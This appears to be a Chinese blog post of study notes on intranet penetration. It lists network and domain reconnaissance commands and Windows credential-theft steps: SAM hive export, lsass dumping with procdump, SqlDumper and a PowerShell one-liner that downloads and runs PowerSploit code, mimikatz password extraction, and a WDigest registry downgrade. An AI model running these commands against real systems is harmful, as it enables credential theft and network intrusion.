<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: true,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="最近在学习内网渗透，整理一些关于内网渗透的文章">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;内网渗透&#39;">
<meta property="og:url" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/index.html">
<meta property="og:site_name" content="Emerald Dream">
<meta property="og:description" content="最近在学习内网渗透，整理一些关于内网渗透的文章">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/02.01.Network-Topology.png">
<meta property="og:image" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/03.01.Two-Level.png">
<meta property="og:image" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/03.02.Two-Level.png">
<meta property="og:image" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/03.03.Three-Level.png">
<meta property="og:updated_time" content="2019-06-02T10:23:14.616Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="&#39;内网渗透&#39;">
<meta name="twitter:description" content="最近在学习内网渗透，整理一些关于内网渗透的文章">
<meta name="twitter:image" content="https://chirec.github.io/2019/06/01/Intranet-Infiltration/02.01.Network-Topology.png">





  
  
  <link rel="canonical" href="https://chirec.github.io/2019/06/01/Intranet-Infiltration/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>'内网渗透' | Emerald Dream</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Emerald Dream</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    
  
  

  

  <a href="https://github.com/yourname" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewbox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a>



    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://chirec.github.io/2019/06/01/Intranet-Infiltration/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="chessur">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Emerald Dream">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">'内网渗透'

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-06-01 14:31:25" itemprop="dateCreated datePublished" datetime="2019-06-01T14:31:25+08:00">2019-06-01</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-06-02 18:23:14" itemprop="dateModified" datetime="2019-06-02T18:23:14+08:00">2019-06-02</time>
              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近在学习内网渗透，整理一些关于内网渗透的文章</p>
<a id="more"></a>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><p>内网渗透需要不断收集网络信息&amp;系统信息&amp;应用信息&amp;硬件信息，在用系统自带的命令加参数列表构成多功能查询或者第三方应用软件多维度查询，得到想要的目标结果，上一个命令为下一个命令做铺垫，环环相扣，最终集合全部有效的结果集，在进行内网渗透下一阶段实行动作做准备。</p>
<h2 id="通用信息"><a href="#通用信息" class="headerlink" title="通用信息"></a>通用信息</h2><h3 id="网络配置信息"><a href="#网络配置信息" class="headerlink" title="网络配置信息"></a>网络配置信息</h3><p>查看接入的网段，网关，子网掩码</p>
<p>使用Kali下的nbtscan工具获取主机名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nbtscan -r 192.168.126.0/24</span><br></pre></td></tr></table></figure>
<h3 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h3><p>网络拓扑<br>与外网的连通性<br>与内网其他网段的连通性<br>与外网之间是否有端口访问限制<br>与内网其他网段之间是否有端口访问限制</p>
<h3 id="存活IP"><a href="#存活IP" class="headerlink" title="存活IP"></a>存活IP</h3><p>对内网进行扫描需要做代理</p>
<p>F-NAScan</p>
<p>GitHub地址：<a href="https://github.com/ywolf/F-NAScan" target="_blank" rel="noopener">https://github.com/ywolf/F-NAScan</a></p>
<p>netdiscover</p>
<p>Kali自带，扫描存活主机</p>
<p>nbtscan</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nbtscan -r 1192.168.126.0/24</span><br></pre></td></tr></table></figure>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#nmap发现存活主机</span><br><span class="line">nmap --script discovery 192.168.126.0</span><br><span class="line">#nmap 同网段优先使用arp探测</span><br><span class="line">nmap -R 192.168.126.0/24</span><br><span class="line">#nmap 跨网段ICMP探测</span><br><span class="line">nmap -sP 192.168.127.0/24</span><br></pre></td></tr></table></figure>
<h4 id="nmap-vulners"><a href="#nmap-vulners" class="headerlink" title="nmap-vulners"></a>nmap-vulners</h4><p>下载地址：<a href="https://github.com/vulnersCom/nmap-vulners" target="_blank" rel="noopener">https://github.com/vulnersCom/nmap-vulners</a></p>
<p>需要在Nmap目录下下载</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#nmap vulner脚本扫描</span><br><span class="line">nmap --script=nmap-vulners -sV 192.168.126.126</span><br></pre></td></tr></table></figure>
<h4 id="nmap-vulscan"><a href="#nmap-vulscan" class="headerlink" title="nmap-vulscan"></a>nmap-vulscan</h4><p>利用本地的配置文件来检索CVE漏洞信息</p>
<p>下载地址：<a href="https://github.com/scipag/vulscan" target="_blank" rel="noopener">https://github.com/scipag/vulscan</a></p>
<p>需要在Nmap目录下下载</p>
<p>查看本地的配置文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd vulscan/utilities/updater</span><br><span class="line">chmod +x updateFiles.sh</span><br><span class="line">./updateFiles.sh</span><br></pre></td></tr></table></figure>
<p>使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#nmap vulscan 脚本</span><br><span class="line">nmap --script vulnscan -sV 192.168.126.126</span><br><span class="line">#一次只能查询一个数据库，可以使用vulscandb参数添加数据库</span><br><span class="line">nmap --script vulscan --script-argsvulscandb=database_name -sV 192.168.126.126</span><br><span class="line">nmap --script vulscan --script-argsvulscandb=exploitdb.csv -sV 192.168.126.126</span><br><span class="line">nmap –script vulscan –script-argsvulscandb=scipvuldb.csv -sV 192.168.126.126</span><br><span class="line">nmap –script vulscan –script-argsvulscandb=securitytracker.csv -sV 192.168.126.126</span><br></pre></td></tr></table></figure>
<h3 id="敏感信息"><a href="#敏感信息" class="headerlink" title="敏感信息"></a>敏感信息</h3><p>数据库密码</p>
<p>浏览器保存密码</p>
<p>浏览器历史记录</p>
<p>远程桌面历史记录</p>
<p>键盘记录</p>
<h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><h3 id="网络信息"><a href="#网络信息" class="headerlink" title="网络信息"></a>网络信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br><span class="line">arp -a</span><br><span class="line">route print #打印路由表</span><br><span class="line">net view</span><br><span class="line">net session #查看远程连过来的session</span><br><span class="line">dsquery | nltest #域内信息收集</span><br><span class="line">nbtstat -A #查询内网存活主机</span><br><span class="line">tracert ip #跟踪目标主机</span><br><span class="line">nbtscan -r ip #查看内网主机(需要安装)</span><br><span class="line">netsh firewall show config #查看防火墙默认配置策略</span><br><span class="line">netsh advfirewall firewall show rule name=all #查看防火墙规则</span><br></pre></td></tr></table></figure>
<h3 id="域信息"><a href="#域信息" class="headerlink" title="域信息"></a>域信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">dsquery server #获取域控主机名</span><br><span class="line">net group &quot;domain controller&quot; /domain #获取域控主机名</span><br><span class="line">ping hostname #获取主机名对应IP</span><br><span class="line">net user /domain #查询域用户</span><br><span class="line">net group /domain #查询域中的工作组</span><br><span class="line">net group &quot;domain admins&quot; /domain #查询域管理用户</span><br><span class="line">net group &quot;domain computers&quot; /domain #查询域内所有主机名</span><br><span class="line">net user domain-admin /domain #查看管理员登录时间，密码过期时间，是否有登录脚本，组分配等信息</span><br><span class="line">net time /domain #查看域时间，以及与服务器的名字</span><br><span class="line">net localgroup administrators /domain #查询域管理员用户组</span><br><span class="line">net localgroup administrators workgroup\username /add  #域用户添加到域管理员用户组</span><br><span class="line">net group &quot;Domain controllers&quot;    #查看域控制器</span><br><span class="line">net view /domain #查询域列表</span><br><span class="line">net view /domain:domainname #查看workgroup域中计算机列表</span><br><span class="line">net user uesername /domain #获取指定账户信息</span><br><span class="line">net config workstation #查询当前登录域</span><br><span class="line">net accounts /domain #获取域密码策略设置</span><br><span class="line">nltest /dsgetdc:domainname #找域控</span><br><span class="line">nltest /dclist:domainname-a #pdc是主域控</span><br><span class="line">nltest /domain_trusts #列出域之间的信任关系</span><br></pre></td></tr></table></figure>
<h3 id="端口信息"><a href="#端口信息" class="headerlink" title="端口信息"></a>端口信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano #查看端口开启情况</span><br><span class="line">netsh #端口转发</span><br></pre></td></tr></table></figure>
<h3 id="系统信息"><a href="#系统信息" class="headerlink" title="系统信息"></a>系统信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br><span class="line">hostname</span><br><span class="line">set</span><br><span class="line">net statistics workstation</span><br><span class="line">net share</span><br><span class="line">cmdkey /l #查看是否保存了登录凭证</span><br><span class="line">net statistics server #查看登录时间</span><br><span class="line">wmic os</span><br></pre></td></tr></table></figure>
<h3 id="安装信息"><a href="#安装信息" class="headerlink" title="安装信息"></a>安装信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wmic qfe #查看补丁信息</span><br><span class="line">powershell &quot;Get-WmiObject -class Win32_Product |Select-Object -Property name,version&quot; #查看安装软件</span><br><span class="line">wmic product #查看安装软件</span><br></pre></td></tr></table></figure>
<p>在Windows XP下，低权限用户不能使用WMIC命令</p>
<h3 id="进程信息"><a href="#进程信息" class="headerlink" title="进程信息"></a>进程信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tasklist /svc</span><br></pre></td></tr></table></figure>
<h3 id="用户信息"><a href="#用户信息" class="headerlink" title="用户信息"></a>用户信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">net user</span><br><span class="line">net localgroup</span><br><span class="line">query user</span><br><span class="line">net config workstation #查看当前登录用户信息</span><br><span class="line">whoami</span><br><span class="line">whoami /all #查看是否过UAC</span><br><span class="line">spn -l username #查看域内某个用户的SPN记录</span><br></pre></td></tr></table></figure>
<h3 id="敏感文件"><a href="#敏感文件" class="headerlink" title="敏感文件"></a>敏感文件</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir/b/s config.* #查看所有config配置文件</span><br></pre></td></tr></table></figure>
<h3 id="密码Hash"><a href="#密码Hash" class="headerlink" title="密码Hash"></a>密码Hash</h3><p>Windows下使用mimikatz</p>
<h4 id="从SAM中提取目标系统本地用户密码Hash"><a href="#从SAM中提取目标系统本地用户密码Hash" class="headerlink" title="从SAM中提取目标系统本地用户密码Hash"></a>从SAM中提取目标系统本地用户密码Hash</h4><p>使用<code>reg</code>将<code>sam</code>、<code>system</code>和<code>security</code>文件导出来，并拖回本地。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cd Desktop</span><br><span class="line">reg save HKLM\SYSTEM system.hiv</span><br><span class="line">reg save HKLM\SAM sam.hiv</span><br><span class="line">reg save HKLM\SECURITY sercrity.hiv</span><br></pre></td></tr></table></figure>
<p>PS：本地复原机器与目标机器需一致。</p>
<h4 id="通过dump-lsass-exe进程数据离线免杀抓取明文"><a href="#通过dump-lsass-exe进程数据离线免杀抓取明文" class="headerlink" title="通过dump lsass.exe进程数据离线免杀抓取明文"></a>通过dump lsass.exe进程数据离线免杀抓取明文</h4><h5 id="1-procdump-exe"><a href="#1-procdump-exe" class="headerlink" title="1.procdump.exe"></a>1.procdump.exe</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits</span><br><span class="line">C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits</span><br></pre></td></tr></table></figure>
<p>本地还原</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe</span><br><span class="line">sekurlsa::minidump lsass.dmp</span><br><span class="line">sekurlsa::logonPasswords full</span><br></pre></td></tr></table></figure>
<h5 id="2-PowerShell"><a href="#2-PowerShell" class="headerlink" title="2.PowerShell"></a>2.PowerShell</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">powershell IEX (New-Object Net.WebClient).DownloadString(&apos;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1&apos;);&quot;Get-Process lsass | Out-Minidump&quot;</span><br><span class="line">//或者本机执行</span><br><span class="line">powershell –exec bypass –Command &quot;&amp; &#123;Import-Module &apos;C:\Users\Public\Out-Minidump.ps1&apos;; Get-Process lsass | Out-Minidump&#125;&quot;</span><br></pre></td></tr></table></figure>
<h5 id="3-SqlDumper"><a href="#3-SqlDumper" class="headerlink" title="3.SqlDumper"></a>3.SqlDumper</h5><p>如果目标系统上安装了<code>Windows SQL Server</code>，<code>SqlDumper.exe</code>默认存放在c:\Program Files\Microsoft SQL Server\number\Shared，其中number代表sql server的版本。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">140 for SQL Server 2017</span><br><span class="line">130 for SQL Server 2016</span><br><span class="line">120 for SQL Server 2014</span><br><span class="line">110 for SQL Server 2012</span><br><span class="line">100 for SQL Server 2008</span><br><span class="line">90 for SQL Server 2005</span><br></pre></td></tr></table></figure>
<p>当然，如果没有安装有<code>Windows SQL Server</code>的话，可以自己上传一个<code>SqlDumper.exe</code>上去。</p>
<p>使用方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">c:\Users\Public&gt;tasklist /svc |findstr lsass.exe&quot;</span><br><span class="line">lsass.exe                      512 SamSs</span><br><span class="line"></span><br><span class="line">c:\Users\Public&gt;SqlDumper-2016.exe 512 0 0x01100</span><br><span class="line">Parsed parameters:</span><br><span class="line">    ProcessID = 512</span><br><span class="line">    ThreadId = 0</span><br><span class="line">    Flags = 0x120</span><br><span class="line">    MiniDumpFlags = 0x1966</span><br><span class="line">    SqlInfoPtr = 0x0000000000000000</span><br><span class="line">    DumpDir = &lt;NULL&gt;</span><br><span class="line">    ExceptionRecordPtr = 0x0000000000000000</span><br><span class="line">    ContextPtr = 0x0000000000000000</span><br><span class="line">    ExtraFile = &lt;NULL&gt;</span><br><span class="line">    PatternForExtraFiles = &lt;NULL&gt;</span><br><span class="line">    InstanceName = &lt;NULL&gt;</span><br><span class="line">    ServiceName = &lt;NULL&gt;</span><br><span class="line">Remote process didn&apos;t specify a dump file name</span><br><span class="line">Target suspended</span><br><span class="line">Callback type 11 not used</span><br><span class="line">Callback type 15 not used</span><br><span class="line">Callback type 7 not used</span><br><span class="line">MiniDump completed: SQLDmpr0001.mdmp</span><br><span class="line">Total Buffer pool data pages filtered out: 0 KB</span><br><span class="line">Total Hekaton data pages filtered out: 0 KB</span><br><span class="line">Total Free memory (from non top level allocators) filtered out: 0 KB</span><br><span class="line">Total top level free memory filtered out: 0 KB</span><br><span class="line">Total Log pool memory filtered out: 0 KB</span><br><span class="line">Location of module &apos;dbghelp.dll&apos; : &apos;C:\Windows\system32\dbghelp.dll&apos;</span><br><span class="line">File version of module &apos;C:\Windows\system32\dbghelp.dll&apos; : &apos;6.1:7601.17514&apos;</span><br><span class="line">Product version of module &apos;C:\Windows\system32\dbghelp.dll&apos; : &apos;6.1:7601.17514&apos;</span><br><span class="line">GetModuleHandle () Failed 0x7e - The specified module could not be found.</span><br><span class="line"></span><br><span class="line">Watson Invoke: No</span><br></pre></td></tr></table></figure>
<h4 id="windows-10-2012r2-以后系统的明文密码抓取方式"><a href="#windows-10-2012r2-以后系统的明文密码抓取方式" class="headerlink" title="windows 10 / 2012r2 以后系统的明文密码抓取方式"></a>windows 10 / 2012r2 以后系统的明文密码抓取方式</h4><p>在<code>windows 10 / 2012</code>之后的系统版本中，默认情况下是禁用了在内存缓存中存储系统用户明文密码。此时使用mimikatz去抓取密码，会显示null，通过修改注册表来获取明文密码。</p>
<p><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential</code></p>
<p>改为1即可</p>
<p>通过PowerShell：</p>
<p>修改注册表键值为“1”：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PS C:\&gt; New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1</span><br></pre></td></tr></table></figure>
<p>锁定目标PC：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">PS C:\&gt; Function Lock-WorkStation &#123;</span><br><span class="line">$signature = @&quot;</span><br><span class="line">[DllImport(&quot;user32.dll&quot;, SetLastError = true)]</span><br><span class="line">public static extern bool LockWorkStation();</span><br><span class="line">&quot;@</span><br><span class="line">$LockWorkStation = Add-Type -memberDefinition $signature -name &quot;Win32LockWorkStation&quot; -namespace Win32Functions -passthru</span><br><span class="line">$LockWorkStation::LockWorkStation() | Out-Null</span><br><span class="line">&#125;</span><br><span class="line">Lock-WorkStation</span><br></pre></td></tr></table></figure>
<p>抓取目标系统解锁事件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PS C:\&gt; Register-wmievent -query &quot;SELECT * FROM Win32_ProcessStopTrace WHERE ProcessName = &apos;LogonUI.exe&apos;&quot; -Action $actionblock</span><br></pre></td></tr></table></figure>
<p>以上的这些操作，我们只需通过 <a href="https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1" target="_blank" rel="noopener">Invoke-MimikatzWDigestDowngrade.ps1</a> 这个 powershell 脚本就能轻松实现。</p>
<h2 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h2><h3 id="系统信息-1"><a href="#系统信息-1" class="headerlink" title="系统信息"></a>系统信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">uname -a #查看内核版本</span><br><span class="line">uname -r</span><br><span class="line">cat /proc/version </span><br><span class="line">getconf LONG_BIT #查看操作系统位数</span><br></pre></td></tr></table></figure>
<h3 id="网络信息-1"><a href="#网络信息-1" class="headerlink" title="网络信息"></a>网络信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ifconfig</span><br><span class="line">netstat -antlup</span><br><span class="line">netdiscover -r ip</span><br><span class="line">nmap</span><br><span class="line">masscan ip -p -banners</span><br></pre></td></tr></table></figure>
<h3 id="敏感文件-1"><a href="#敏感文件-1" class="headerlink" title="敏感文件"></a>敏感文件</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd</span><br><span class="line">/etc/shadow</span><br><span class="line">/var/log/</span><br><span class="line">history</span><br><span class="line">.bash_history</span><br><span class="line">.ssh</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<h3 id="进程信息-1"><a href="#进程信息-1" class="headerlink" title="进程信息"></a>进程信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">top</span><br><span class="line">ps aux</span><br><span class="line">apt list</span><br><span class="line">chkconfig --list</span><br></pre></td></tr></table></figure>
<h1 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h1><p>适用端口转发的网络环境有以下几种：</p>
<p>1.服务器处于内网，可以访问外部网络<br>2.服务器处于外网，可以访问外部网络，但是服务器安装了防火墙来拒绝敏感端口的连接<br>3.服务器处于内网，对外只开放了80端口，并且服务器不能访问外网网络</p>
<p>对于以上三种情况，lcx可以突破1和2二种，但是第3种就没有办法了，因为lcx在使用中需要访问外部网络</p>
<h2 id="Socket端口转发"><a href="#Socket端口转发" class="headerlink" title="Socket端口转发"></a>Socket端口转发</h2><h3 id="lcx"><a href="#lcx" class="headerlink" title="lcx"></a>lcx</h3><p>lcx是一个基于Socket套接字实现的端口转发工具，它是从Linux下的Htran工具移植到Windows平台的<br>一条正常的Socket隧道必须具备两端，一端为Server，它会监听一个端口等待Client连接；另一端为Client，通过传入Server的IP和端口，才能主动连接到服务器</p>
<p><img src="/2019/06/01/Intranet-Infiltration/02.01.Network-Topology.png" alt></p>
